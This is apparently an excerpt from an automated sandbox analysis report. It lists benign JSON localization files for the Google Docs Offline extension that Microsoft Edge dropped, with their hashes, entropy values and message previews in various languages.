                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                  Malicious:false
